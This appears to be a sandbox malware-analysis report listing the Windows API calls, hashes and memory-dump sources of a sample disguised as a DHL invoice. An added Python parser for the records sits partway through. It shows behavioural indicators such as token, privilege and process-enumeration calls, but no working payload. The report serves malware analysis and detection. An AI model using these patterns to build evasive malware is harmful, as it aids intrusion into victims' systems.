                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 420147892-0
                                                                                                                        • Opcode ID: a3fff9ed887d1be86591b0bb1b312ddd7231df756bca8b0d37a017f284c50e4c
                                                                                                                        • Instruction ID: c0eec102c60e0781f6519c89cc481415bd8f4bdffa4fb902937f28755496a902
                                                                                                                        • Opcode Fuzzy Hash: a3fff9ed887d1be86591b0bb1b312ddd7231df756bca8b0d37a017f284c50e4c
                                                                                                                        • Instruction Fuzzy Hash: 133193711083009FD702EF54C882AAFBBE8EF99354F14092DF5858A1A1EB71A949CB92
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,003CCB68), ref: 0039D2FB
                                                                                                                        • GetLastError.KERNEL32 ref: 0039D30A
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0039D319
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CCB68), ref: 0039D376
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2267087916-0
                                                                                                                        • Opcode ID: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                                                                                                                        • Instruction ID: 5c0115bedb4d847c52ad2689509a157380ad01b8d9e9e94939d167c4be403e82
                                                                                                                        • Opcode Fuzzy Hash: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                                                                                                                        • Instruction Fuzzy Hash: CB219F74508201DF8B02DF28C8C28AAB7E8AF56365F104A1DF499C72A1D731DD46CB93
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                                                                                                                          • Part of subcall function 00391014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                                                                                                                          • Part of subcall function 00391014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                                                                                                                          • Part of subcall function 00391014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                                                                                                                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003915BE
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 003915E1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00391617
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0039161E
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1592001646-0
                                                                                                                        • Opcode ID: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                                                                                                                        • Instruction ID: 95ddcf0473b55c4ba3f7889cc4eecd279eda924eade2f774c3161efb01ef2b4f
                                                                                                                        • Opcode Fuzzy Hash: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                                                                                                                        • Instruction Fuzzy Hash: 02217832E4010AAFDF12DFA4C945BEEB7B8EF45344F0A4459E845BB241E730AA05CBA0
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003C280A
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2824
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2832
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003C2840
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        • Opcode ID: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                                                                                                                        • Instruction ID: 0796af52e4974af942ec8f2df06a6833478c89560e4e4d0448032d4a9a411893
                                                                                                                        • Opcode Fuzzy Hash: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                                                                                                                        • Instruction Fuzzy Hash: F121A135204611AFD7169B24C895FAB7B99AF46324F15815CF42ACB6E2CB71FC42CB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00398D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398D8C
                                                                                                                          • Part of subcall function 00398D7D: lstrcpyW.KERNEL32(00000000,?,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00398DB2
                                                                                                                          • Part of subcall function 00398D7D: lstrcmpiW.KERNEL32(00000000,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398DE3
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397923
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397949
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397984
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: 2b1795667bbb0d25800dc466ed475b8d78eca9eacb42fb80d4616ca07e171d75
                                                                                                                        • Instruction ID: 16b698e8333b539ea5ab66d2ec50087ade0f5d4b5570780393464c2f931032da
                                                                                                                        • Opcode Fuzzy Hash: 2b1795667bbb0d25800dc466ed475b8d78eca9eacb42fb80d4616ca07e171d75
                                                                                                                        • Instruction Fuzzy Hash: 3611D67A210242AFDF165F39D845E7A77A9FF85350B50402AF946CB2A4EF319811C751
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 003C56BB
                                                                                                                        • _wcslen.LIBCMT ref: 003C56CD
                                                                                                                        • _wcslen.LIBCMT ref: 003C56D8
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 455545452-0
                                                                                                                        • Opcode ID: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                                                                                                                        • Instruction ID: 22287c36b5ac00fff2bdcd830440f22e9b75c4402d7990ab78637c68218876bb
                                                                                                                        • Opcode Fuzzy Hash: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                                                                                                                        • Instruction Fuzzy Hash: FF11E13160060896DB229F61CC85FEE77ACAF10364F10406EF905D6081E770EEC4CB60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00391A47
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A59
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A6F
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A8A
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                                                                                                                        • Instruction ID: b90c88207dc31e11f5da24d8cb07e489e1f301bd39096a200b6d630b10bad62f
                                                                                                                        • Opcode Fuzzy Hash: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                                                                                                                        • Instruction Fuzzy Hash: 9511F73AD01219FFEF119BA5C985FADFB78EB08750F210091EA04B7290D671AE50DB94
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0039E1FD
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0039E230
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0039E246
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0039E24D
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        • Opcode ID: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                                                                                                                        • Instruction ID: e305e04b62d5c1863d0e14dc17cfa75b1e98893502a2397268daf138d22a0d7b
                                                                                                                        • Opcode Fuzzy Hash: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                                                                                                                        • Instruction Fuzzy Hash: C3112B76D04258BFDB02EFA8DC05E9E7FACEB45310F144625F824E3691D670DD0487A0
APIs
• CreateThread.KERNEL32(00000000,?,0035CFF9,00000000,00000004,00000000), ref: 0035D218
• GetLastError.KERNEL32 ref: 0035D224
• __dosmaperr.LIBCMT ref: 0035D22B
• ResumeThread.KERNEL32(00000000), ref: 0035D249
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
• Instruction ID: 3d98d1210983d9bbedcfbfe07f175b4b80c5c73e094e9e9eef0fc06e003adedb
• Opcode Fuzzy Hash: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
• Instruction Fuzzy Hash: 0701D276815208BBCB235BA6DC09FAE7A6DDF81332F114619FD259A1F0DB708909C7A0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
• GetStockObject.GDI32(00000011), ref: 00336060
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
• Instruction ID: 5fe8a6a40ba88ca14cd9fbb9980663d0ce1b1f74985f7765a2e189c446f76f55
• Opcode Fuzzy Hash: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
• Instruction Fuzzy Hash: FD116D72505508BFEF174FA49C86EEABB6DEF093A4F055215FA1992120D732EC60DBA0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 00353B56
  • Part of subcall function 00353AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00353AD2
  • Part of subcall function 00353AA3: ___AdjustPointer.LIBCMT ref: 00353AED
• _UnwindNestedFrames.LIBCMT ref: 00353B6B
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00353B7C
• CallCatchBlock.LIBVCRUNTIME ref: 00353BA4
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
• Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
• Instruction ID: 328b1b9ceca077ebae6c275da7bf5cf183d039f03c87f4b4e1d023ef9d03f0be
• Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
• Instruction Fuzzy Hash: 43012932100148BBDF125E95CC42EEB3B69EF48799F054014FE489A121D732E965DBA0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003313C6,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue), ref: 003630A5
• GetLastError.KERNEL32(?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000,00000364,?,00362E46), ref: 003630B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000), ref: 003630BF
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
• Instruction ID: 14b6001cfe5ccbd64f426a1cad2271099d006b326be3a7b1b6db24be0579c591
• Opcode Fuzzy Hash: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
• Instruction Fuzzy Hash: 2601D432312222ABCB334A79AC44E677B9CEF05BA1F158620F90BE3144C721D909C7E0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0039747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00397497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003974AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003974CA
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
• Instruction ID: 31dcb48a65d0d69c7d69db084c395a858fb500c3c8272f4919f707f022109f0e
• Opcode Fuzzy Hash: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
• Instruction Fuzzy Hash: 9011A1B12253119BEB228F16DC08FA27BFCEF00B00F108569E61AD6592D770F904DB90
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B126
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
• Instruction ID: 5aa50fccbcf7564c65267e614600d0050d59634a18402beb44df3b7498229d0a
• Opcode Fuzzy Hash: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
• Instruction Fuzzy Hash: 8E115B31C0162DE7CF02AFE5EA69AEEFB78FF49711F114095D981B2281CB3056508B91
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
• GetCurrentThreadId.KERNEL32 ref: 00392DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
• Instruction ID: 6e8126733ea5ce9b9ad53f958f15ac74ecd2fa22d482779ac12e2a905dc37453
• Opcode Fuzzy Hash: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
• Instruction Fuzzy Hash: E5E09272511624BBDB221B739C0DFEB3E6CFF42BA1F051015F10AD10809AA4D841C7B0
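The records above are the Joe Sandbox IDA plugin's per-function API listing: one `APIs` block per disassembled function, each call written as `Name.MODULE(args), ref: address`, with `?` for arguments the plugin could not resolve and `Part of subcall function` for calls made one level down. Reading dozens of these by eye is slow, so the following is an added example (this editor's code, not Joe Sandbox's or the sample's) that parses such records into structured objects and queries them. The `SAMPLE` text is constructed by trimming three records from this page; the record and query names are this editor's own. Two queries are shown on it: the `LoadLibraryExW` pair at 003630A5/003630BF, where the flag 0x800 (`LOAD_LIBRARY_SEARCH_SYSTEM32`) on the first call is dropped to 0 (default search order) on the retry, which is the shape of the Visual C++ CRT's WinAPI thunk loader and consistent with the `FlsSetValue` argument visible in the record, and the `SendMessageTimeoutW` / `AttachThreadInput` sequence at 00392DC5, where `WM_NULL` is sent with `SMTO_ABORTIFHUNG` (2) and a 0x1388 = 5000 ms timeout before the caller attaches to the window thread's input queue.

```python
"""Parse the per-function 'APIs' records printed by the Joe Sandbox IDA plugin
into structured objects so call sequences can be queried programmatically.
Added example; the record/query names, the heuristics and the trimmed SAMPLE
text are this editor's assumptions, not part of Joe Sandbox or the report."""
import re
from dataclasses import dataclass, field
from typing import Optional

LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800  # documented LoadLibraryEx flag value

# Constructed sample: three records trimmed from the listing above.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003313C6,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue), ref: 003630A5
• GetLastError.KERNEL32(?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000,00000364,?,00362E46), ref: 003630B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000), ref: 003630BF
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• Opcode ID: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
• GetCurrentThreadId.KERNEL32 ref: 00392DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• Opcode ID: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
APIs
  • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003C8887
• LineTo.GDI32(?,?,?), ref: 003C8894
"""

# 'Name.MODULE(args), ref: ADDR' with optional 'Part of subcall function X:' prefix;
# the argument list is optional (e.g. 'GetCurrentThreadId.KERNEL32 ref: ...').
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:~]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# '• Key: value' metadata lines (API ID, Opcode ID, Source File, ...)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                       # int for hex literals, None for '?', str otherwise
    ref: int                         # call-site address
    subcall_of: Optional[str] = None # address of the callee when listed as a subcall


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")


def _parse_args(raw: Optional[str]) -> list:
    if raw is None or raw.strip() == "":
        return []
    out = []
    for tok in raw.split(","):
        tok = tok.strip()
        if tok == "?":
            out.append(None)
            continue
        try:
            out.append(int(tok, 16))
        except ValueError:
            out.append(tok)          # string literal argument such as FlsSetValue
    return out


def parse_report(text: str) -> list:
    """Split the listing on 'APIs' headers and parse each record's calls and fields."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not stripped.startswith("•"):
            continue                 # section headers such as 'Memory Dump Source'
        m = API_LINE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]),
                                         int(m["ref"], 16), m["sub"]))
            continue
        f = FIELD_LINE.match(line)
        if f:
            current.fields[f["key"]] = f["value"]
    return records


def call_sequence(record: FunctionRecord) -> list:
    """Direct calls of the function, in listing order (subcall lines excluded)."""
    return [c.name for c in record.calls if c.subcall_of is None]


def has_system32_search_fallback(record: FunctionRecord) -> bool:
    """True when LoadLibraryExW(..., LOAD_LIBRARY_SEARCH_SYSTEM32) is later retried with flags 0."""
    saw_restricted = False
    for c in record.calls:
        if c.name == "LoadLibraryExW" and len(c.args) >= 3:
            if c.args[2] == LOAD_LIBRARY_SEARCH_SYSTEM32:
                saw_restricted = True
            elif saw_restricted and c.args[2] == 0:
                return True
    return False


def index_by_opcode_id(records: list) -> dict:
    """Map Opcode ID -> record, for cross-referencing with other reports' hashes."""
    return {r.opcode_id: r for r in records if r.opcode_id}


if __name__ == "__main__":
    for r in parse_report(SAMPLE):
        print(r.api_id or "<no API ID>", "->", " > ".join(call_sequence(r)),
              "| system32 fallback:", has_system32_search_fallback(r))
```

The parser keeps unresolved `?` arguments as `None` rather than dropping them, so positional checks such as "third argument of `LoadLibraryExW`" still line up with the Win32 prototype; a record whose flag argument is unresolved simply does not match the fallback query.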
APIs
  • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
  • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
  • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
  • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003C8887
• LineTo.GDI32(?,?,?), ref: 003C8894
• EndPath.GDI32(?), ref: 003C88A4
• StrokePath.GDI32(?), ref: 003C88B2
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
APIs
• GetSysColor.USER32(00000008), ref: 003498CC
• SetTextColor.GDI32(?,?), ref: 003498D6
• SetBkMode.GDI32(?,00000001), ref: 003498E9
• GetStockObject.GDI32(00000005), ref: 003498F1
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
APIs
• GetCurrentThread.KERNEL32 ref: 00391634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003911D9), ref: 00391648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039164F
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
